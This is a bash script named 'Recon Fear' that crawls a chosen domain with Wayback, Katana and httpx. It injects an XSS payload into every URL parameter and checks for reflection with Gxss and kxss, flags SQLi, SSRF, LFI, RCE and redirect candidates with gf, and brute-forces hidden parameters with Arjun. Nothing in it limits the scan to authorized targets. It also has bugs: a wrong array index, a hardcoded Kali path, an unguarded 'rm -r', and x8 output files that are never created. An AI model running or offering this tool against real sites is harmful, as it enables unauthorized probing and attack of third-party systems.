Recon Fear
#!/bin/bash
# Color definitions
REDCOLOR="\e[31m"
GREENBOLD="\e[1;32m"
WELCOMCOLOR="\e[1;3;33m"
CYANBOLD="\e[1;36m"
BLUE="\e[1;34m"
PURPLE="\e[1;35m"
NC="\e[0m"
# Function to display the welcome message with cool ASCII art
function show_welcome {
clear
# Display ASCII art for title and user message
figlet -f slant "Recon Fear" | lolcat -a -s 100
echo -e "${CYANBOLD}------------------------------- Created by Muhammad Asad -------------------------------\n"
echo -e "${REDCOLOR}------------------------------------------------------------------------------------------"
echo -e "${WELCOMCOLOR}=================================== Recon Fear ================================\n"
}
# Main script execution
show_welcome
# Sample random quote or message
arr=("Knowledge is power, let’s hack it right!" "Prepare yourself for an awesome recon journey..." "Hacking is an art, not a crime.")
random=$((RANDOM % 4))
# Display random message
echo -e "${GREENBOLD}${arr[$random]}\n"
# Stylish separator
echo -e "${REDCOLOR}------------------------------------------------------------------------------------------$NC\n"
# Ask the user for the website URL or domain
echo -e "${GREENBOLD}Enter the website URL or domain: ${NC}"
read website_input
echo -e "$REDCOLOR----------------------------------------------------------------------------------------------$NC\n"
# Normalize the input: Add "https://" if the input is just a domain without protocol
if [[ ! $website_input =~ ^https?:// ]]; then
website_url="https://$website_input"
website_without_protocol="$website_input" # No protocol for paramspider
else
website_url="$website_input"
website_without_protocol="${website_input#https://}" # Remove both http and https
website_without_protocol="${website_without_protocol#http://}" # Remove both http and https
fi
# Inform the user of the normalized URL being used
echo -e "${REDCOLOR}Normalized URL with protocol: $website_url"
echo -e "${REDCOLOR}Website URL without protocol: $website_without_protocol"
# Create a endpoints_output directory if it doesn't exist
rm -r "endpoints_output"
output_dir="endpoints_output"
mkdir -p "$output_dir"
filter_static() {
grep -Evi '\.(css|js|jpe?g|png|gif|webm|avi|dll|pl|c|py|sh|deb|exe|zip|mp4|mp3|mpeg|mpg|flv|wmv|wma|aac|m4a|ogg|bat|dat|cfg|bin|tiff?|csv|ttf|pptx?|ppsx|docx?|xlsx?|mpp|mdb|json|woff2?|svg|txt|jar|pdf|ico|0|1|2|3|4|m4r|kml|pro|yao|gcn3|egy|par|lin|yht)([/?#\.].*|$)' \
| sed -E 's/:80([/?#]|$)/\1/g; s/:443([/?#]|$)/\1/g; s/:8443([/?#]|$)/\1/g; s/:8080([/?#]|$)/\1/g'
}
# Step 3: Run waybackurl passively and append results to "all_endpoints.txt"
echo -e "${REDCOLOR}Running waybackurl passively..."
wget -O "$output_dir/wayback.txt" "https://web.archive.org/cdx/search/cdx?url=*.$website_without_protocol/*&output=text&fl=original&collapse=urlkey&from="
# Step 3: Run Katana Actively"
echo -e "${REDCOLOR}Running Katana Actively..."
cat "/home/kali/target/subdomains_output/livesubdomains.txt" | katana -o "$output_dir/katana.txt"
cat "$output_dir/wayback.txt" "$output_dir/katana.txt" | sort -u | tee "$output_dir/xss_vibes.txt"
# Step 6: Filter "all_endpoints.txt" for Unique and Live Endpoints..
echo -e "${GREENBOLD}Filtering Unique Endpoints for Vulnerabilities ..."
cat "$output_dir/xss_vibes.txt" | filter_static | uro | httpx -mc 200 -silent | tee "$output_dir/endpoints.txt"
# Step 7: Filter "endpoints.txt" for FUZZ different vulnerabilities
echo -e "Filtering Parameters for Vulnerabilities ..."
cat "$output_dir/endpoints.txt" | filter_static | grep "=" | sort -u | tee "$output_dir/fuzz_parameters.txt"
# Step 8: Filter "all_endpoints.txt" for Unique and Live Endpoints..
echo -e "${CYANBOLD}Filtering Unique Endpoints for Vulnerabilities ..."
cat "$output_dir/fuzz_parameters.txt" | filter_static | qsreplace '"><img src=x onerror=alert(1)>' | tee "$output_dir/xss_fuzz.txt"
cat "$output_dir/xss_fuzz.txt" | freq | tee "$output_dir/possible_xss.txt"
cat "$output_dir/possible_xss.txt" | grep "XSS FOUND" | sed 's/XSS FOUND: //' | tee "$output_dir/reflected-xss.txt"
# Step 8: XSS Testing on All Passive Parameters
echo "${BLUE}Running XSS Testing on All Parameters with Quick Analysis..."
cat "$output_dir/fuzz_parameters.txt" | filter_static | Gxss -c 100 -p '">asad<hacked' | tee "$output_dir/confirm-xss.txt"
# Step 11: Filter URLs for different vulnerabilities using GF (XSS, Open Redirect, etc.)
echo -e "${REDCOLOR}Filtering URLs for potential vulnerabilities... (XSS, Open Redirect, LFI, etc.)"
cat "$output_dir/endpoints.txt" | gf xss | sort -u > "$output_dir/xss_endpoints.txt"
cat "$output_dir/endpoints.txt" | gf redirect | sort -u > "$output_dir/open_redirect_endpoints.txt"
cat "$output_dir/endpoints.txt" | gf lfi | sort -u > "$output_dir/lfi_endpoints.txt"
cat "$output_dir/endpoints.txt" | gf sqli | sort -u > "$output_dir/sqli_endpoints.txt"
cat "$output_dir/endpoints.txt" | gf ssrf | sort -u > "$output_dir/ssrf_endpoints.txt"
cat "$output_dir/endpoints.txt" | gf rce | sort -u > "$output_dir/rce_endpoints.txt"
# Additional steps (Arjun, x8, etc.) would follow the same pattern, appending results to the appropriate subdomain folder
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# step 9: Extract the ext-Endpoints for Find Hidden Parameters with Arjun and save output to a file (ext_endpoint.txt)
echo -e "${PURPLE}Filtering Ext-Endpoint for Find Hidden Parameters with Arjun..."
cat "$output_dir/endpoints.txt" | grep -Ei "\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$" | tee -a "$output_dir/ext_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 10: Filtering Unique Ext-Endpoints
echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with Arjun..."
cat "$output_dir/ext_endpoints.txt" | filter_static | uro | httpx -mc 200 -silent | tee "$output_dir/arjun_ext-endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 11: Find Hidden Parameters on Passive Ext-Endpoints with Arjun
echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..."
arjun -i "$output_dir/arjun_ext-endpoints.txt" -oT "$output_dir/arjun_result_ext_endpoints.txt"
cat "$output_dir/arjun_result_ext_endpoints.txt" | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee "$output_dir/arjun-xss.txt"
cat "$output_dir/arjun-xss.txt" | kxss | tee -a "$output_dir/kxss-result.txt"
cat "$output_dir/arjun-xss.txt" | Gxss -c 100 -p asad | tee -a "$output_dir/Gxss-result.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find with x8: x8_xss.txt...\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find with Arjun: arjun_xss.txt...\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find KXSS: kxss-result.txt...\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find KXSS: Gxss-result.txtt...\n"
# Notify user that all tasks are complete for all subdomains
echo -e "${GREENBOLD}----------------------------------------------------------------------------------------------$NC\n"
echo -e "${REDCOLOR}All tasks are complete for all subdomains...\n"
Last updated